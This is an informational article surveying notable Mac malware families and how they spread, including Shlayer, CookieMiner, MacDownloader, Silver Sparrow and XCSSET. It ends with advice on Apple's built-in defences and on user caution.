A decade ago, viruses targeting Apple devices were too rare to take seriously and didn’t measure up against Windows threats in terms of quantity and sophistication. This was, in part, due to a relatively low Mac market share that discouraged cybercriminals from stepping into that niche.
A lot has changed ever since. The rapidly growing popularity of Macs and iDevices around the world made crooks rethink their practices. According to a report by security firm Malwarebytes, the average Mac computer was infected with 11 harmful applications in 2019, almost twice the number for PCs (5.8).
The complexity of these threats has grown as well. Persistent browser hijackers, adware, crypto miners, and file-encrypting ransomware have become the unsettling norm in this ecosystem despite the Cupertino company’s efforts to fend them off. The following paragraphs will shed light on notorious strains of malicious code that target devices with the Apple logo.
Originally tailored to hit Windows machines, predatory programs hidden in Visual Basic for Applications (VBA) macros are increasingly common in the Mac threat landscape these days. Here is how the scheme works: malware operators send out phishing emails with attachments that look like benign Word files. When an unsuspecting recipient opens the document, they are prompted to enable macros so that the content becomes readable. This slip-up triggers a script that quietly downloads malware onto the system.
Also known as OSX/Shlayer, this culprit was first spotted in early 2018. It is doing the rounds via booby-trapped Adobe Flash Updates advertised on malicious or hacked websites. If a user gets on the hook and installs the bundle, a scareware program from the infamous Advanced Mac Cleaner family ends up inside the computer. It starts displaying fake threat detection alerts to dupe the user into purchasing its full version to fix these inexistent issues.
This Mac threat is geared toward retrieving victims’ cryptocurrency wallet information. It steals Google Chrome and Safari cookies associated with popular cryptocurrency exchanges such as Bitstamp, Coinbase, and MyEtherWallet. CookieMiner also comes with a module that piggybacks on CPU resources to mine coins behind the user’s back.
Bing/Yahoo Redirect Virus
Rerouting a victim’s web browser to junk sites is one of the dominating cybercrime techniques affecting Macs. But in some scenarios, the landing page isn’t malicious at all, as is the case with the virus that redirects to Bing or Yahoo Search. The attackers’ real objective, though, is to monetize web traffic via shady advertising networks whose URLs are inconspicuously hit before the user visits a legitimate search engine.
OSX.Pirrit is multifunctional adware distributed mainly through cracked versions of mainstream applications such as Adobe Photoshop and Microsoft Office components. Its goal is to display superfluous ads on web pages and download other threats onto a Mac computer without the user’s consent.
Designed to amass victims’ sensitive information, the MacDownloader malware was at its peak in 2017. It zeroed in on employees working for high-profile organizations such as U.S. defense contractors. Once inside a Mac, it would trigger a series of permission requests disguised as regular system notifications. By escalating its privileges in a system, the baddie accesses keychains, harvests the victim’s authentication data, and sends it to its operators’ Command & Control (C2) server.
This is another nasty coin miner unleashed in 2018. When running, it gobbles up most, if not all processing power of the host Mac without throttling CPU consumption. The resulting performance drain makes the computer almost unusable, causes serious overheating issues, and may lead to hardware damage.
Having kicked off in the early 2010s as a Windows-only phenomenon, ransomware is now a firmly established type of predatory code haunting Mac machines. Since around 2016, there have been several outbreaks involving the KeRanger, MacRansom, and Patcher strains. Last year, two more samples called EvilQuest and ThiefQuest jumped on the hype train. These pests encrypt victims’ data or lock it inside a password-protected archive and then demand bitcoins for recovery.
In November 2020, Apple introduced the M1 system on a chip (SoC) technology, marketing rock-solid security as one of its fundamental advantages. Three months later, cybercrooks launched a malicious application called SilverSparrow that bypassed the protection and ran natively on devices with Apple silicon inside. Back then, its traces were spotted on about 29,000 Macs. The culprit uses several dialogs to trick the victim into giving it excessive permissions. It also establishes a connection with a remote C2 server, which means that it can submit the user’s data to its masters.
This malware debuted in August 2020. It stands out from the crowd due to distribution quirks and adverse effects. Its original version attached itself to Xcode projects shared by unsuspecting developers on GitHub. Later on, XCSSET authors switched to using zero-day exploits to infect Macs. After infiltration, this strain modifies browser sessions, takes screenshots of what the victim is doing, and collects personally identifiable data. To add insult to injury, it comes with an encryption component and may hold files for ransom.
Apple is trying to stay ahead of the security game. The prominent building blocks of its defensive barrier include the XProtect anti-malware, the Gatekeeper feature based on app notarization controls, the new M1 chip architecture, and the SecureEnclave technology that keeps users’ data safe. But let’s face it: cybercrooks are agile enough to bypass these mechanisms. Therefore, instead of relying solely on built-in system protection, users should exercise caution with dubious websites and suspicious downloads on the Internet.